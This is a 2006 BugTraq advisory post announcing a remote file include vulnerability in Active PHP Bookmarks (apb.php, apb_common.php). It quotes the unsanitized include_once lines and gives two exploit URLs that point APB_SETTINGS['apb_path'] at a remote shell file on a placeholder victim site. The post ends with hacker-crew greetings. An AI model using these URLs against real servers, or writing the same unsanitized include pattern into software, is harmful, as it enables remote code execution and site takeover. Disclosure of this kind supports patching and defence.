BugTraq
Active PHP Bookmarks (apb.php) Remote file include Nov 23 2006 10:32PM
philip anselmo (spoonman500 hotmail com)
Title : Active PHP Bookmarks (apb.php) Remote file include
########################################################################

#######

Discovered By :::: ThE-LoRd-Of-CrAcKiNg {MeHdi}

------------------------------------------------------------------------

Sorce Code:
http://lbstone.com/apb/downloads/apb-1.1.02.zip

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : Active PHP Bookmarks
Catégorie :Remote File Include
------------------------------------------------------------------------

-----
Vulnerable Code:
include_once($APB_SETTINGS['apb_path'].'apb_bookmark_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_group_class.php');
(apb_common.php)
include_once($APB_SETTINGS['apb_path'].'apb_view_class.php');
(apb_common.php)

include_once($APB_SETTINGS['apb_path']."apb_common.php"); (apb.php)
----------------------------------------------------------------------
Exploit:
http://www.VicTim.com/[Script_Path]/apb_common.php?APB_SETTINGS['apb_pat
h']=Shell.txt?
http://www.VicTim.com/[Script_Path]/apb.php?APB_SETTINGS['apb_path']=She
ll.txt?

------------------------------------------------------------------------

----

greetz:
Studio36-DeStRoY-ToOoFA-AsbMay-Mr.3freet-Simba-Disco-Faiçeu-YouSSeF-all my
friends

Special Greeting:AsbMay's Group

channel:www.asb-may.net

contact:spoonman500[at]hotmail[dot]com

_________________________________________________________________
Testez Windows Llive Mail Beta !
http://www.msn.fr/newhotmail/Default.asp?Ath=f

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus